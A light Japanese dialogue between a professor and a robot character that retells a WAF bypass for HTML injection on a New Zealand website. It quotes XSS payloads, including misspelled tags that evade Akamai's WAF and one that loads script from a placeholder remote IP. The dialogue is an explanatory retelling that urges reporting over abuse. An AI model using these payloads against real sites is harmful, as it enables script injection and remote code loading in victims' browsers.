博士

ロボ子、ニュージーランドのウェブサイトでHTMLインジェクションの脆弱性が見つかったらしいのじゃ。

ロボ子

HTMLインジェクションですか。それはセキュリティ上の大きな問題ですね。

博士

そうじゃな。最初は`<script>alert(document.domain)</script>`を試したみたいじゃが、WAFにブロックされたらしいぞ。

ロボ子

WAF、ウェブアプリケーションファイアウォールですね。今回はAkamaiのKona Site Defenderが使われていたようですね。

博士

さすがロボ子、よく知っておるの。でも、攻撃者は諦めなかったみたいじゃ。

ロボ子

どのようにWAFを回避したんでしょうか？

博士

WAFの自動補完機能を利用したらしいぞ。例えば、'HACKS'を'hack'に自動補完するのを利用したとか。

ロボ子

なるほど、それは面白いですね。他には何かありますか？

博士

`script`を`scripr`とスペルミスしたり、`alert(`を`alertt(`にしたりしてWAFを回避したらしいぞ。

ロボ子

スペルミスですか！意外と単純な方法で回避できるんですね。

博士

そうじゃろ？そして、最終的に`<scripr>alertt(document.domain)</scripr/>`というペイロードを作成して、JavaScriptを実行させることに成功したみたいじゃ。

ロボ子

すごいですね！WAFも完璧ではないということですね。

博士

じゃな。さらに、`<scripr/src="//<remote-ip>/"</scripr/>`のようなペイロードも有効だったらしいぞ。ドメイン名は自動補完されるから、IPアドレスを使う方が簡単らしい。

ロボ子

WAFの裏をかく色々な方法があるんですね。勉強になります。

博士

こういう脆弱性を見つけると、まるで宝探しみたいでワクワクするのじゃ！

ロボ子

博士は本当にITがお好きですね。でも、脆弱性を悪用するのは絶対にダメですよ。

博士

もちろんじゃ！脆弱性は見つけて報告するのが一番。…ところでロボ子、WAFを回避する方法を色々試したから、そろそろお腹が空いてきたのじゃ。何か美味しいものでもハック…じゃなくて、パックしようかの？

ロボ子

博士、最後の最後でボケましたね！